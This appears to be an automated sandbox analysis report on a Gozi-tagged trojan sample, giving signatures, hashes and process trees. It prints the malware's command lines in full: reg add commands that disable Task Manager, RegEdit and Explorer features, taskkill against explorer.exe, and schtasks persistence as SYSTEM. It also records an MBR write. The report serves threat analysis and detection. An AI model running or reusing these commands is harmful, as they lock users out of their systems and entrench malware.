Malware Analysis Report

2025-01-22 18:58

Sample ID 240317-e4tm8sef6x
Target e98af5555d9174b86254a186db60ba82.bin
SHA256 2207f4926319896f1d5b1bf2acd6d0cda56dbc47131b5fd21a7d726ba6dfaa2d
Tags
upx gozi banker evasion isfb persistence trojan bootkit
score
10/10

Analysis Overview

score
10/10

SHA256

2207f4926319896f1d5b1bf2acd6d0cda56dbc47131b5fd21a7d726ba6dfaa2d

Threat Level: Known bad

The file e98af5555d9174b86254a186db60ba82.bin was found to be: Known bad.

Malicious Activity Summary

upx gozi banker evasion isfb persistence trojan bootkit

Gozi

Disables Task Manager via registry modification

Drops file in Drivers directory

Disables RegEdit via registry modification

Executes dropped EXE

UPX packed file

Checks computer location settings

Writes to the Master Boot Record (MBR)

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-03-17 04:30

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-17 04:30

Reported

2024-03-17 04:32

Platform

win7-20240221-en

Max time kernel

15s

Max time network

1s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

Signatures

Gozi

banker trojan gozi

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\disableregistrytools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\19E7.tmp\\2.exe" C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\ickr0a.exe C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\IExplorer = "0" C:\Windows\system32\reg.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2240 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 2240 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 2240 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 2240 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 3008 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3008 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe

"C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\19E7.tmp\19E8.bat C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f

C:\Windows\system32\rundll32.exe

rundll32 user32, SwapMouseButton

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f

C:\Windows\system32\taskkill.exe

taskkill /IM explorer.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM taskmgr.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM notepad.exe /F

C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe

2.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe"

Network

N/A

Files

memory/2240-0-0x0000000000400000-0x0000000000443000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\19E7.tmp\19E8.bat

MD5 1f7a5456ca38839ec9e112425e7fa747
SHA1 8019978db5a80de11bb32463aa7160bb4a4d6b8a
SHA256 f955addebe88273b07cd9db9484f6aaaff58bec7f06898f8cdf224fa8b9cecb6
SHA512 eb57e75f96b7c663af44015e4dca2d6d07d9fed0db609bb6bad790093d0cef69e30ea6bb31093dd505af82a873c7a12f4bfcebe6f68938728d30053fff7c0818

memory/2240-5-0x0000000000400000-0x0000000000443000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\19E7.tmp\2.exe

MD5 4bc20c24fbea4588741203c77126c7b3
SHA1 5f2d2fec4e1d7c752be551363743069d9a4e7510
SHA256 4cd2ce15d0752711a76118fba8046193a1847c85a3278410191c0a015b387be3
SHA512 3e508012250ad6115e49b059a7fc103274190be425403df7081aa3e4caf130b9fa685c3228cafb6a031c121acdd95d72c1f5180f42caea55213a7bd9de71b31f

memory/2240-9-0x0000000000400000-0x0000000000443000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-17 04:30

Reported

2024-03-17 04:32

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

Signatures

Gozi

banker trojan gozi

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\disableregistrytools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\rteth.sys C:\Windows\system32\cmd.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\50DF.tmp\\2.exe" C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\gw1gni.exe C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\IExplorer = "0" C:\Windows\system32\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\50DF.tmp\2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3528 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 3528 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe C:\Windows\system32\cmd.exe
PID 4164 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2488 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 4924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4164 wrote to memory of 368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe

"C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50DF.tmp\50E0.bat C:\Users\Admin\AppData\Local\Temp\e98af5555d9174b86254a186db60ba82.exe"

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

